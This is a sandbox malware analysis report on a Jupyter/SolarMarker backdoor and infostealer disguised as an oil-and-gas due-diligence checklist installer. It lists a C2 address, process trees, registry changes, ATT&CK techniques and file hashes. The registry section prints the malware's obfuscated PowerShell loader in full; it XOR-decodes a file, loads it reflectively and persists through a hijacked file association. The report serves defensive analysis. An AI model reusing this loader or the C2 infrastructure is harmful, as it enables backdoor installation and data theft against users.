jupyter | c16b701105afe180c77befa58f8140f9583a1b0538d13b43e52eb2b996885124

General

Target

Due-Diligence-Checklist-For-Oil-And-Gas-Properties.msi

Score

10^/10

jupyter backdoor stealer trojan

Malware Config

Extracted

Family

jupyter

Version

SP-13

C2

http://45.42.201.248

Signatures

Jupyter Backdoor/Client Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1280-1911-0x00000000096A0000-0x00000000096A8000-memory.dmp	family_jupyter

Jupyter, SolarMarker
Jupyter is a backdoor and infostealer first seen in mid 2020.
backdoor trojan stealer jupyter
Blocklisted process makes network request 3 IoCs

Processes:

msiexec.exepowershell.exe

flow pid process

6 1832 msiexec.exe
8 1832 msiexec.exe
9 1280 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

MSI502A.tmp

pid process

1408 MSI502A.tmp

flow	pid	process
6	1832	msiexec.exe
8	1832	msiexec.exe
9	1280	powershell.exe

pid	process
1408	MSI502A.tmp

Drops startup file 1 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\MICROSofT\wINdOwS\staRt MEnU\PROgRaMs\staRTup\abfe9e9acdd4c183ad426abc88479.lnK	powershell.exe

Loads dropped DLL 2 IoCs

Processes:

MsiExec.exe

pid process

920 MsiExec.exe
920 MsiExec.exe

pid	process
920	MsiExec.exe
920	MsiExec.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

MSI502A.tmp

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	MSI502A.tmp
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\ProcessorNameString	MSI502A.tmp
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSI502A.tmp
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSI502A.tmp

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

MSI502A.tmp

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	MSI502A.tmp
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	MSI502A.tmp
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	MSI502A.tmp

Modifies registry class 7 IoCs

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\mlsquesojuhywrl\shell\open\command\ = "PowersHElL -wINDOwStYLe HIdDEn -ep BypASS -coMMaNd \"$ae898dcfc24431a74b3c1ba635282='QHJSKEleT2wzWUB9cmk4QHJIfThAVTVQIUB3MWJmQFJnXm9AfThgd0B7XiNlQHx1dlFAc15VM0ByOSthXlFFPThAe0BzKEB1PDY+QH5GUzRAcT4lSUB0ZFRVQHd1YkReUzZlRF5QK15UXjFaZFRAfGM7MF5NYW5mQDFlUXl0RmV5XlFmaGNAVj1zeDwtV0deek9rZTZ1KHFWQHpNUylzblh2SkptNygmUGsmVz1WbXlZcU9rQ083VHdYWEEmZ3JELWhocFk=';$a84b042eeeb4a4a8a2216c8f5b3aa=[SySTem.io.file]::READAllBytES('C:\\Users\\Admin\\AppData\\Roaming\\MiCrOsoFt\\UNpFKteogOCmxA\\AtNbGjDTsZyadeKgW.yweDfhMRVGQt');foR($ad6c4e2f3ef4f0a84c8f0bdcc186c=0;$ad6c4e2f3ef4f0a84c8f0bdcc186c -LT $a84b042eeeb4a4a8a2216c8f5b3aa.CounT;){FOR($abc7feb99fa43dba4479c37e0a07a=0;$abc7feb99fa43dba4479c37e0a07a -lt $ae898dcfc24431a74b3c1ba635282.lENgth;$abc7feb99fa43dba4479c37e0a07a++){$a84b042eeeb4a4a8a2216c8f5b3aa[$ad6c4e2f3ef4f0a84c8f0bdcc186c]=$a84b042eeeb4a4a8a2216c8f5b3aa[$ad6c4e2f3ef4f0a84c8f0bdcc186c] -bXOr $ae898dcfc24431a74b3c1ba635282[$abc7feb99fa43dba4479c37e0a07a];$ad6c4e2f3ef4f0a84c8f0bdcc186c++;iF($ad6c4e2f3ef4f0a84c8f0bdcc186c -gE $a84b042eeeb4a4a8a2216c8f5b3aa.COuNT){$abc7feb99fa43dba4479c37e0a07a=$ae898dcfc24431a74b3c1ba635282.leNgTh}}};[SYstEm.REfleCTiOn.aSSembLY]::LoaD($a84b042eeeb4a4a8a2216c8f5b3aa);[MArS.DeImos]::iNtErAct()\""	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\.sqelcvlfmtwnomrscuh	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\.sqelcvlfmtwnomrscuh\ = "mlsquesojuhywrl"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\mlsquesojuhywrl\shell\open\command	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\mlsquesojuhywrl	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\mlsquesojuhywrl\shell	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\mlsquesojuhywrl\shell\open	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

1280 powershell.exe
1280 powershell.exe
1280 powershell.exe

pid	process
1280	powershell.exe
1280	powershell.exe
1280	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exe

description	pid	process
Token: SeShutdownPrivilege	1832	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1832	msiexec.exe
Token: SeSecurityPrivilege	2280	msiexec.exe
Token: SeCreateTokenPrivilege	1832	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1832	msiexec.exe
Token: SeLockMemoryPrivilege	1832	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1832	msiexec.exe
Token: SeMachineAccountPrivilege	1832	msiexec.exe
Token: SeTcbPrivilege	1832	msiexec.exe
Token: SeSecurityPrivilege	1832	msiexec.exe
Token: SeTakeOwnershipPrivilege	1832	msiexec.exe
Token: SeLoadDriverPrivilege	1832	msiexec.exe
Token: SeSystemProfilePrivilege	1832	msiexec.exe
Token: SeSystemtimePrivilege	1832	msiexec.exe
Token: SeProfSingleProcessPrivilege	1832	msiexec.exe
Token: SeIncBasePriorityPrivilege	1832	msiexec.exe
Token: SeCreatePagefilePrivilege	1832	msiexec.exe
Token: SeCreatePermanentPrivilege	1832	msiexec.exe
Token: SeBackupPrivilege	1832	msiexec.exe
Token: SeRestorePrivilege	1832	msiexec.exe
Token: SeShutdownPrivilege	1832	msiexec.exe
Token: SeDebugPrivilege	1832	msiexec.exe
Token: SeAuditPrivilege	1832	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1832	msiexec.exe
Token: SeChangeNotifyPrivilege	1832	msiexec.exe
Token: SeRemoteShutdownPrivilege	1832	msiexec.exe
Token: SeUndockPrivilege	1832	msiexec.exe
Token: SeSyncAgentPrivilege	1832	msiexec.exe
Token: SeEnableDelegationPrivilege	1832	msiexec.exe
Token: SeManageVolumePrivilege	1832	msiexec.exe
Token: SeImpersonatePrivilege	1832	msiexec.exe
Token: SeCreateGlobalPrivilege	1832	msiexec.exe
Token: SeCreateTokenPrivilege	1832	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1832	msiexec.exe
Token: SeLockMemoryPrivilege	1832	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1832	msiexec.exe
Token: SeMachineAccountPrivilege	1832	msiexec.exe
Token: SeTcbPrivilege	1832	msiexec.exe
Token: SeSecurityPrivilege	1832	msiexec.exe
Token: SeTakeOwnershipPrivilege	1832	msiexec.exe
Token: SeLoadDriverPrivilege	1832	msiexec.exe
Token: SeSystemProfilePrivilege	1832	msiexec.exe
Token: SeSystemtimePrivilege	1832	msiexec.exe
Token: SeProfSingleProcessPrivilege	1832	msiexec.exe
Token: SeIncBasePriorityPrivilege	1832	msiexec.exe
Token: SeCreatePagefilePrivilege	1832	msiexec.exe
Token: SeCreatePermanentPrivilege	1832	msiexec.exe
Token: SeBackupPrivilege	1832	msiexec.exe
Token: SeRestorePrivilege	1832	msiexec.exe
Token: SeShutdownPrivilege	1832	msiexec.exe
Token: SeDebugPrivilege	1832	msiexec.exe
Token: SeAuditPrivilege	1832	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1832	msiexec.exe
Token: SeChangeNotifyPrivilege	1832	msiexec.exe
Token: SeRemoteShutdownPrivilege	1832	msiexec.exe
Token: SeUndockPrivilege	1832	msiexec.exe
Token: SeSyncAgentPrivilege	1832	msiexec.exe
Token: SeEnableDelegationPrivilege	1832	msiexec.exe
Token: SeManageVolumePrivilege	1832	msiexec.exe
Token: SeImpersonatePrivilege	1832	msiexec.exe
Token: SeCreateGlobalPrivilege	1832	msiexec.exe
Token: SeCreateTokenPrivilege	1832	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1832	msiexec.exe
Token: SeLockMemoryPrivilege	1832	msiexec.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

msiexec.exe

pid process

1832 msiexec.exe

pid	process
1832	msiexec.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

msiexec.exeMsiExec.exemsiexec.exe

description	pid	process	target process
PID 2280 wrote to memory of 920	2280	msiexec.exe	MsiExec.exe
PID 2280 wrote to memory of 920	2280	msiexec.exe	MsiExec.exe
PID 2280 wrote to memory of 920	2280	msiexec.exe	MsiExec.exe
PID 920 wrote to memory of 1280	920	MsiExec.exe	powershell.exe
PID 920 wrote to memory of 1280	920	MsiExec.exe	powershell.exe
PID 920 wrote to memory of 1280	920	MsiExec.exe	powershell.exe
PID 1832 wrote to memory of 1408	1832	msiexec.exe	MSI502A.tmp
PID 1832 wrote to memory of 1408	1832	msiexec.exe	MSI502A.tmp

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Due-Diligence-Checklist-For-Oil-And-Gas-Properties.msi
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1832

C:\Users\Admin\AppData\Local\Temp\MSI502A.tmp
"C:\Users\Admin\AppData\Local\Temp\MSI502A.tmp"
2⤵
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
PID:1408

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2280

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding E3DA67FD23A1075CF4C32F37B6E2D57C C
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:920

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss50B9.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi5096.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr5097.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr50A8.txt" -propSep " :<->: " -testPrefix "_testValue."
3⤵
- Blocklisted process makes network request
- Drops startup file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1280

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

3

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

3

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\MSI47AD.tmp
MD5
07ce413b1af6342187514871dc112c74

SHA1
8008f8bfeae99918b6323a3d1270dea63b3a8394

SHA256
0ba7e90fe2a0005e1e0dad53e2678916650c3b95ff9b666b802d128276c8ec46

SHA512
27df52bfcbc2d0ce3756a2526e632b5610d7047259b31aeeff12652de3e046bcd239e39c222a323654f475f1f913679b4fdd858303e0e105f7a300b6f6ed0fe5

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI502A.tmp
MD5
91841e006225ac500de7630740a21d91

SHA1
68875ce8177794df6bf125b2bb8b8ecc3b84517b

SHA256
cb1d73323d3d80004ada185844b0d461abd9ded736d5dc690607f935b4f2b58a

SHA512
d66e70b9d4d1997ac687589d0723c78e6ffe96aa35343b71f4e57750b7aad33d5555fd5d6b743125852e13cc9b9c338a8fb6b4844768054321404a8491546f0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI503B.tmp
MD5
c26c68e4a79fd2629714b17514411c40

SHA1
00138d8edea0918c4476da303415be399cf704c6

SHA256
55434961c0b4bed88ae6bfe6e0e61a3a3dcc392858f0e53c6c14c272200203ed

SHA512
6fc8028e6e52b6c9e74ac3ea6d19ed750047d46b7e4021d46e581b58367ffc11fb13b696dfa30a15305e94098a7fd12051ee37d32df91ef2ae1e2d9c642b02ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\pss50B9.ps1
MD5
0c95bc11cfca37f84a19de0529377e13

SHA1
41f409dbbab04ef35c4f6489af6f85fceb9c501a

SHA256
88748aae11029228d84aef0855f4bc084dfd70450db1f7029746d8bc85182f93

SHA512
8a52f3c40440e3129a367609ee4b6e9e98aa62edec48592be03bad1aadcd389e2e58e095f4ea3d6f9cb458aa7101fcb5afdff66658885bfa0634c74c086db568

Download Submit
C:\Users\Admin\AppData\Local\Temp\scr5097.ps1
MD5
2908843ef0e8bb1207fe9a351cece994

SHA1
f98cb3d404c5823eca0027740d44acc8bcce214b

SHA256
f6aa48bc45be3b603a48a5261a28cc75e9c1c2f65aa37bb807b6c1bd80dce05a

SHA512
b660f2393b3978db34057fae047b73ade6122f8fb56569996a81235c681442c9d55e2223ac2045579b6e27b886f20d7f04520eb851ea7efeef30b401900d08a0

Download Submit
\Users\Admin\AppData\Local\Temp\MSI47AD.tmp
MD5
07ce413b1af6342187514871dc112c74

SHA1
8008f8bfeae99918b6323a3d1270dea63b3a8394

SHA256
0ba7e90fe2a0005e1e0dad53e2678916650c3b95ff9b666b802d128276c8ec46

SHA512
27df52bfcbc2d0ce3756a2526e632b5610d7047259b31aeeff12652de3e046bcd239e39c222a323654f475f1f913679b4fdd858303e0e105f7a300b6f6ed0fe5

Download Submit
\Users\Admin\AppData\Local\Temp\MSI503B.tmp
MD5
c26c68e4a79fd2629714b17514411c40

SHA1
00138d8edea0918c4476da303415be399cf704c6

SHA256
55434961c0b4bed88ae6bfe6e0e61a3a3dcc392858f0e53c6c14c272200203ed

SHA512
6fc8028e6e52b6c9e74ac3ea6d19ed750047d46b7e4021d46e581b58367ffc11fb13b696dfa30a15305e94098a7fd12051ee37d32df91ef2ae1e2d9c642b02ea

Download Submit
memory/920-118-0x0000000000000000-mapping.dmp

Download
memory/1280-136-0x0000000007BC0000-0x0000000007BC1000-memory.dmp

Filesize
4KB

Download
memory/1280-139-0x00000000080A0000-0x00000000080A1000-memory.dmp

Filesize
4KB

Download
memory/1280-133-0x0000000004822000-0x0000000004823000-memory.dmp

Filesize
4KB

Download
memory/1280-132-0x0000000004820000-0x0000000004821000-memory.dmp

Filesize
4KB

Download
memory/1280-134-0x00000000071E0000-0x00000000071E1000-memory.dmp

Filesize
4KB

Download
memory/1280-135-0x0000000007970000-0x0000000007971000-memory.dmp

Filesize
4KB

Download
memory/1280-130-0x0000000004860000-0x0000000004861000-memory.dmp

Filesize
4KB

Download
memory/1280-137-0x0000000007C30000-0x0000000007C31000-memory.dmp

Filesize
4KB

Download
memory/1280-138-0x0000000008040000-0x0000000008041000-memory.dmp

Filesize
4KB

Download
memory/1280-131-0x0000000007290000-0x0000000007291000-memory.dmp

Filesize
4KB

Download
memory/1280-140-0x0000000008320000-0x0000000008321000-memory.dmp

Filesize
4KB

Download
memory/1280-1911-0x00000000096A0000-0x00000000096A8000-memory.dmp

Filesize
32KB

Download
memory/1280-146-0x00000000093E0000-0x00000000093E1000-memory.dmp

Filesize
4KB

Download
memory/1280-147-0x0000000009060000-0x0000000009061000-memory.dmp

Filesize
4KB

Download
memory/1280-148-0x00000000090D0000-0x00000000090D1000-memory.dmp

Filesize
4KB

Download
memory/1280-149-0x0000000009980000-0x0000000009981000-memory.dmp

Filesize
4KB

Download
memory/1280-154-0x000000000A500000-0x000000000A501000-memory.dmp

Filesize
4KB

Download
memory/1280-125-0x0000000000000000-mapping.dmp

Download
memory/1280-186-0x0000000004823000-0x0000000004824000-memory.dmp

Filesize
4KB

Download
memory/1408-126-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads